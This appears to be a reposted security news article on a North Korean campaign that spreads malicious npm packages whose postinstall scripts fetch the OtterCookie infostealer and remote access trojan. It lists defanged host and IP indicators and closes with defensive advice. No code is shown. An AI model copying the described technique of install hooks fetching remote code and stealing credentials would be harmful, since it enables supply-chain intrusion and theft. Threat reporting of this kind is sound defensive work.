By rssfeeds-admin 
The operation, tracked as “Contagious Interview” by Socket’s Threat Research Team, continues to exploit supply-chain trust to deliver malware disguised as open-source tools.
class="wp-block-heading" id="h-malicious-npm-packages-and-delivery-chain">Malicious NPM Packages and Delivery Chain
Researchers found that the new wave of malicious npm packages, including “tailwind-magic”, “node-tailwind”, and “react-modal-select“, were uploaded by accounts linked to the North Korean threat actor group operating through a GitHub profile named stardev0914.
These packages mimic legitimate libraries such as “tailwind-merge” but contain hidden installation scripts. Once a developer installs one of these, the package executes a postinstall command that connects to a Vercel-hosted server (tetrismic[.]vercel[.]app).
The server returns malicious JavaScript code that is executed directly on the victim’s machine, granting the attacker remote code execution privileges.
The packages serve as loaders that fetch a second-stage payload known as OtterCookie, a hybrid infostealer and remote access trojan (RAT).
The malware communicates with a command-and-control (C2) server at 144[.]172[.]104[.]117, allowing attackers to issue commands, extract data, and maintain access silently.
OtterCookie Malware Capabilities
Once deployed, the OtterCookie variant fingerprints the victim’s system, performs sandbox checks to avoid analysis, and establishes persistent C2 communication.
It enables attackers to open a remote shell, steal clipboard data, capture screenshots, log keystrokes, and recursively search the file system for secrets, wallet seed phrases, and credentials.
The malware also targets Chrome and Brave browser profiles to extract saved passwords and data from popular cryptocurrency wallet extensions such as MetaMask, Phantom, and Trust Wallet.
Each infected machine becomes a channel for continuous data theft across Windows, macOS, and Linux platforms.
Socket’s analysis revealed that the GitHub repositories associated with stardev0914 were polished and designed to appear legitimate crypto projects.
Some cloned existing projects like Knightsbridge DEX, using them as bait to lure Web3 developers through fake job interviews and coding tests.
Although GitHub has since removed the malicious repositories, at least 15 packages remained active at the time of the report. Researchers warned that new variants are appearing weekly.
Security experts recommend that developers treat every npm installation as a potential remote code execution, pin dependency versions, and review imported packages manually.
Organizations are urged to monitor build processes, apply egress restrictions, and adopt automated scanning tools that identify behaviors such as eval calls, loader scripts, and C2 communications.
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post North Korean Hackers Deploy 197 Malicious NPM Packages to Attack Web3 Developers appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.